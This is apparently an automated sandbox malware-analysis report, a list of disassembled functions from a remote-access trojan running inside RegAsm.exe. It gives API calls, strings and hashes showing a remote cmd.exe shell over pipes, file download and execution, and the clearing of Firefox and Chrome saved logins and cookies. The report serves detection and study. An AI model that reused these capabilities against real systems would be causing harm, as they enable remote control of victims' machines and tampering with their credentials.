                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              • Opcode ID: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
                                                                                              • Instruction ID: 255de9a7584d5d18edeb06657e72cc98f651a1ca3ec2e3fd9487ec56659a492e
                                                                                              • Opcode Fuzzy Hash: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
                                                                                              • Instruction Fuzzy Hash: 4BD0123395864C4ED610AFB9AC0F9A4775CD313611F0003BAADB5835D6F640161CC7EB
                                                                                              Function 00448DAD Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: af07f8042e9d64b5c48f61514af179ec3043f9bb200c83292f727c6f8af59790
                                                                                              • Instruction ID: 7a32008d5298be53c85257f10f5ab89736448bc9763498d58eeaada89b2956af
                                                                                              • Opcode Fuzzy Hash: af07f8042e9d64b5c48f61514af179ec3043f9bb200c83292f727c6f8af59790
                                                                                              • Instruction Fuzzy Hash: 1FD06C3210010DBBDF028F84DD06EDA3BAAFB88714F014050FE1856020C772E861AB94
                                                                                              Function 0041EE6D Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
                                                                                              • Instruction ID: b47cd2b0b3629d5b1c575afa7cea5eba1438416837a73112e9b8902fd82cf9e3
                                                                                              • Opcode Fuzzy Hash: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
                                                                                              • Instruction Fuzzy Hash: B1C04C79504208BB9B051FA19C18D793B69D785660B008425B90555190D57799509695
                                                                                              Function 0041EE86 Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: send
                                                                                              • String ID:
                                                                                              • API String ID: 2809346765-0
                                                                                              • Opcode ID: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
                                                                                              • Instruction ID: 219120072e52f96b3a762e6ed3faccd779c965bd914e66b4b009d712158f5d27
                                                                                              • Opcode Fuzzy Hash: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
                                                                                              • Instruction Fuzzy Hash: A0C04C79104108BB9B051BA19C0CD797B69D749651B00C425B90555150D577991196A5

                                                                                              Non-executed Functions

                                                                                              Function 0040511A Relevance: 35.8, APIs: 10, Strings: 10, Instructions: 835filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 0040513C
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 0040520A
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 0040522C
                                                                                                • Part of subcall function 00414795: FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
                                                                                                • Part of subcall function 00414795: FindNextFileW.KERNEL32(00000000,?), ref: 00414863
                                                                                                • Part of subcall function 00414795: RemoveDirectoryW.KERNEL32(?), ref: 004148DD
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                                • Part of subcall function 004018E7: WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000,?,?,00467C58), ref: 0040196B
                                                                                                • Part of subcall function 004018E7: SetEvent.KERNEL32(?,?,00467C58,?,?,?,?,?,?,004049F5,000000B2), ref: 00401999
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405619
                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004056FA
                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00405946
                                                                                              • DeleteFileA.KERNEL32(?), ref: 00405AD4
                                                                                                • Part of subcall function 00405C8E: __EH_prolog.LIBCMT ref: 00405C93
                                                                                                • Part of subcall function 00405C8E: FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
                                                                                                • Part of subcall function 00405C8E: __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
                                                                                                • Part of subcall function 00405C8E: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
                                                                                              • Sleep.KERNEL32(000007D0), ref: 00405B7A
                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 00405BBC
                                                                                                • Part of subcall function 00414D7F: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Find$AttributesDeleteEventFirstNext$DirectoryDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersRemoveShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$X|F$open
                                                                                              • API String ID: 577278831-3555090288
                                                                                              • Opcode ID: 34e1bf415fd26a7ca512cd6f105531bfd8c4ae79c332249d43635c7f34449658
                                                                                              • Instruction ID: 248697d8118448b10e373b0070428f50d3d60723a4b6fa8bdee278dac68b1eb1
                                                                                              • Opcode Fuzzy Hash: 34e1bf415fd26a7ca512cd6f105531bfd8c4ae79c332249d43635c7f34449658
                                                                                              • Instruction Fuzzy Hash: 2942AF716143006BC604FB76CD5B9AF76A9AF91308F40093FF646671D2EE7C9A0C879A
                                                                                              Function 00403B0B Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 275pipesleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00403B5D
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • __Init_thread_footer.LIBCMT ref: 00403B9A
                                                                                              • CreatePipe.KERNEL32(004697C4,004697AC,004696D0,00000000,004595AC,00000000), ref: 00403C28
                                                                                              • CreatePipe.KERNEL32(004697B0,004697CC,004696D0,00000000), ref: 00403C42
                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,004696E0,004697B4), ref: 00403CB8
                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00403D0F
                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403D32
                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00403D5C
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00467D08,004595B0,00000062,00459594), ref: 00403E5C
                                                                                                • Part of subcall function 0042BE7E: __onexit.LIBCMT ref: 0042BE84
                                                                                              • Sleep.KERNEL32(00000064,00000062,00459594), ref: 00403E78
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00403E91
                                                                                              • CloseHandle.KERNEL32 ref: 00403E9D
                                                                                              • CloseHandle.KERNEL32 ref: 00403EA5
                                                                                              • CloseHandle.KERNEL32 ref: 00403EB7
                                                                                              • CloseHandle.KERNEL32 ref: 00403EBF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                              • String ID: SystemDrive$cmd.exe
                                                                                              • API String ID: 2994406822-3633465311
                                                                                              • Opcode ID: 871f4a9690f7b78bff1b13fbd8a847e4400f9ddedd1785a1e851fd3cc0ef3a14
                                                                                              • Instruction ID: f800c9f0f2bf78fedcc34e7f916c989ee22e489b26dcc0f87d11f274eef4dc79
                                                                                              • Opcode Fuzzy Hash: 871f4a9690f7b78bff1b13fbd8a847e4400f9ddedd1785a1e851fd3cc0ef3a14
                                                                                              • Instruction Fuzzy Hash: 9B919071A10214EBDB01AFA5ED469AD3B6DEB44706B04003BF501B72E1EBF95E04CB9E
                                                                                              Function 00407FDE Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040805D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00408077
                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004081AE
                                                                                              • FindClose.KERNEL32(00000000), ref: 004081D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                              • API String ID: 1164774033-3681987949
                                                                                              • Opcode ID: 57b855908899c3d6cb0aa08850a4e40b7bfd33196d0ffbf6a3129588f598a89c
                                                                                              • Instruction ID: 77c5650d51b0fe3478d1e8891f5765647e4bb1e207f3f9250e523ff0b76e5811
                                                                                              • Opcode Fuzzy Hash: 57b855908899c3d6cb0aa08850a4e40b7bfd33196d0ffbf6a3129588f598a89c
                                                                                              • Instruction Fuzzy Hash: 205193309101199ECB14FB71DE5ADEEB734AF21308F10017FE646761D2EFB85A4ACA59
                                                                                              Function 004081F9 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\,?,00000000), ref: 00408271
                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00408287
                                                                                              • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 004082B1
                                                                                              • DeleteFileA.KERNEL32(00000000,00000000,?,00000000), ref: 00408359
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00408363
                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,?,00000000), ref: 00408377
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040839D
                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 004083BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                              • API String ID: 532992503-432212279
                                                                                              • Opcode ID: ac7f07cb66d10af4894f900f02be6cbf6e2dc0be29ecda64751327359a70b36c
                                                                                              • Instruction ID: 00a5acec732576bc5cbb70c497211a5f1a220084e487e38eff3f49032b11243d
                                                                                              • Opcode Fuzzy Hash: ac7f07cb66d10af4894f900f02be6cbf6e2dc0be29ecda64751327359a70b36c
                                                                                              • Instruction Fuzzy Hash: F941C6309002159ACB14FB75DD5A9EEB734AF51704F5000BFF946B21C2EF7C4A89C699
                                                                                              Function 004124EF Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                              • API String ID: 0-3177665633
                                                                                              • Opcode ID: 121a3592c4d627644b7613a3178fe27230fa3b39a28e2843e82d91f1b4e484ed
                                                                                              • Instruction ID: d49e1bb01a71b31e9a514e8ab9d79bfde0f8a8990e09ce8f733d3f3a0fa78d10
                                                                                              • Opcode Fuzzy Hash: 121a3592c4d627644b7613a3178fe27230fa3b39a28e2843e82d91f1b4e484ed
                                                                                              • Instruction Fuzzy Hash: E271F2B05083029ED315EF21C9A6FAB7794AF44310F10492FF692A72D1DAB89D8DC75B
                                                                                              Function 00412E96 Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00468490), ref: 00412EAD
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00412EF4
                                                                                              • GetLastError.KERNEL32 ref: 00412F02
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00412F33
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,0045F170,00000000,0045F170,00000000,0045F170), ref: 00413003
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                                                                              • String ID:
                                                                                              • API String ID: 2247270020-0
                                                                                              • Opcode ID: 03bbdadf1e06b6092d6cf74d1a2c49cb7c75222df334b420a06ae581c84964c6
                                                                                              • Instruction ID: 67645d11a30bc640d3fdd44f05f185ca840b8eb7349b3fd14ad573a0dba1d346
                                                                                              • Opcode Fuzzy Hash: 03bbdadf1e06b6092d6cf74d1a2c49cb7c75222df334b420a06ae581c84964c6
                                                                                              • Instruction Fuzzy Hash: BD815B31D00119ABCB19EFA1DC569EEB738AF14309F20802AF50677191EF786F49CB68
                                                                                              Function 00414795 Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00414863
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004148DD
                                                                                              • FindClose.KERNEL32(00000000), ref: 0041490B
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00414914
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00414931
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0041493E
                                                                                              • GetLastError.KERNEL32 ref: 00414966
                                                                                              • FindClose.KERNEL32(00000000), ref: 00414979
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              • API String ID: 2341273852-0
                                                                                              • Opcode ID: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                                                                              • Instruction ID: 67d1b46c084ba7a1db363377ae0973eb7806ada5b67af0ef92577c41b38a644f
                                                                                              • Opcode Fuzzy Hash: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                                                                              • Instruction Fuzzy Hash: B3513B799002598ACF24EF78C8446FBB375FF95304F5041EAE84597250EB758EC6CB58
                                                                                              Function 0040D9A0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388registrylibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA73
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA7F
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0040DC4F
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040DC56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                              • API String ID: 2127411465-314212984
                                                                                              • Opcode ID: 60a29829e8ec836dbfb95753b66f99fb8d2724bec4b539cd6858d8474a25220a
                                                                                              • Instruction ID: 4074bb3242a5131e9af16332fb1fca2d579f27d95419dd5672c9eea20478749a
                                                                                              • Opcode Fuzzy Hash: 60a29829e8ec836dbfb95753b66f99fb8d2724bec4b539cd6858d8474a25220a
                                                                                              • Instruction Fuzzy Hash: 05C1F872A1430066C604BB76CD5B96E36A99F95748F40093FF606BB1D3ED7C9A0CC39A
                                                                                              Function 00444821 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044492D
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00444988
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00444997
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,0043A13A,00000040,?,0043A25A,00000055,00000000,?,?,00000055,00000000), ref: 004449DF
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,0043A1BA,00000040), ref: 004449FE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                              • String ID: |9E
                                                                                              • API String ID: 745075371-2862116995
                                                                                              • Opcode ID: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                                                                              • Instruction ID: a0d23eae2eab3cce0e6143c8aade0d1d31ecb2808b135d4201b82ffc1078fed3
                                                                                              • Opcode Fuzzy Hash: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                                                                              • Instruction Fuzzy Hash: BD5181B1900219ABFF10EFB5DC46BBF73B8EF89701F04016AE910E7290D77899409B69
                                                                                              Function 0044464D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 004446E6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 0044470F
                                                                                              • GetACP.KERNEL32(?,?,0044496C,?,00000000), ref: 00444724
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP$lID
                                                                                              • API String ID: 2299586839-1000943563
                                                                                              • Opcode ID: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                                                                              • Instruction ID: b776c1f794edacfa1d566d42b41839c959f8c97492637f1cf3d15b7234cf2928
                                                                                              • Opcode Fuzzy Hash: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                                                                              • Instruction Fuzzy Hash: F421C462A00101AAF7308F64C800B97B3A6FFD6B55B578166E80AC7310FB3EDE41C758
                                                                                              Function 00407EC0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data,00000000), ref: 00407EFC
                                                                                              • GetLastError.KERNEL32 ref: 00407F06
                                                                                              Strings
                                                                                              • [Chrome StoredLogins not found], xrefs: 00407F20
                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 00407F2C
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407EC7
                                                                                              • UserProfile, xrefs: 00407ECC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                              • API String ID: 2018770650-1062637481
                                                                                              • Opcode ID: c03a34522a1bd99ec328411317d4ae97edc3be59d92fa28a2dfb0bdd23ac4345
                                                                                              • Instruction ID: cd3047e91bfde3af176f2c882389411367fa10c8d8f2a88c8bde0a27d8164f9d
                                                                                              • Opcode Fuzzy Hash: c03a34522a1bd99ec328411317d4ae97edc3be59d92fa28a2dfb0bdd23ac4345
                                                                                              • Instruction Fuzzy Hash: 38012631E941069BCA04BBB5CE1B8EE7724A961305F50017FFA02731D2ED7E5909C2DB
                                                                                              Function 00410D25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000026,00000000,?,?,?,0040FC02,00000026), ref: 00410D32
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0040FC02,00000026), ref: 00410D39
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00410D4B
                                                                                              • AdjustTokenPrivileges.ADVAPI32(00000026,00000000,?,00000000,00000000,00000000), ref: 00410D6A
                                                                                              • GetLastError.KERNEL32 ref: 00410D70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 3534403312-3733053543
                                                                                              • Opcode ID: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                                                                              • Instruction ID: 9eef06880bab16d35be2c706b8c727757efcd913256d8b96f55afeb896bd8697
                                                                                              • Opcode Fuzzy Hash: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                                                                              • Instruction Fuzzy Hash: 3FF03A75901128ABDB109BA0ED0DEEF7FBCEF06219F104061B905A2051D6744A09CAB5
                                                                                              Function 004476F8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                                                                              • Instruction ID: 4aadb4acba26e1cacb22562d3062cd2e5fa0d248af99932944c2a23c9cbf1606
                                                                                              • Opcode Fuzzy Hash: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                                                                              • Instruction Fuzzy Hash: 75C23C71E086288FEB65CE289D407EEB7B5EB44305F1545EBD40DE7240EB78AE828F45
                                                                                              Function 004072E5 Relevance: 9.3, APIs: 6, Instructions: 316fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004072EA
                                                                                                • Part of subcall function 0040170E: connect.WS2_32(?,?,?), ref: 00401726
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00407382
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004073E0
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00407438
                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040744F
                                                                                                • Part of subcall function 00401C4F: WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,00000000,00401AD4,00000000,?,?,?,?,00467C58), ref: 00401C59
                                                                                                • Part of subcall function 00401C4F: SetEvent.KERNEL32(?,?,00467C58), ref: 00401C68
